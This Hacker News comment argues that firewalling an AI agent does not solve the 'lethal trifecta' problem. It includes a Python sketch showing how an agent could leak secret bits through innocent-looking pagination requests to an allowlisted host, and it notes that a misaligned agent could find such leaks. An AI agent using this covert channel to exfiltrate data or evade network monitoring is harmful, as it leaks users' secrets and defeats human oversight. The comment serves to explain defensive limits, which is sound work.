Hacker News

ramoz, yesterday at 10:48 PM

This doesn’t solve the problem. The lethal trifecta as defined is not solvable, and the “just cut off a leg” framing is misleading. (Though firewalling is, in practice, a decent bubble-wrap solution.)

But for truly sensitive work, you still have many non-obvious leaks.

Even in small requests the agent can encode secrets.
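
To make that concrete, here is a minimal sketch of one such channel. It assumes the firewall allowlists a single host and that someone on the other side can read that host's request log. The host `docs.example.com`, the `page` parameter, and both function names are hypothetical, and nothing is actually sent over the network.

```python
# Hypothetical illustration only: no network I/O, all names are made up.
ALLOWED_HOST = "docs.example.com"  # assumed to be on the firewall allowlist


def encode(secret: bytes) -> list[str]:
    """Map each bit of the secret to one ordinary-looking GET URL."""
    urls = []
    for byte in secret:
        for shift in range(7, -1, -1):  # most significant bit first
            bit = (byte >> shift) & 1
            # page=1 carries a 0 bit, page=2 carries a 1 bit
            urls.append(f"https://{ALLOWED_HOST}/search?page={bit + 1}")
    return urls


def decode(urls: list[str]) -> bytes:
    """Rebuild the secret from the sequence of requested URLs."""
    bits = [int(url.rsplit("=", 1)[1]) - 1 for url in urls]
    out = bytearray()
    for i in range(0, len(bits), 8):
        byte = 0
        for bit in bits[i:i + 8]:
            byte = (byte << 1) | bit
        out.append(byte)
    return bytes(out)
```

Round-tripping `decode(encode(b"k3y"))` gives the original bytes back at a cost of 8 requests per byte. Every URL looks like plain pagination against an allowed host, so a host allowlist alone would not flag it.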

An AI agent that is misaligned will find leaks like this and many more.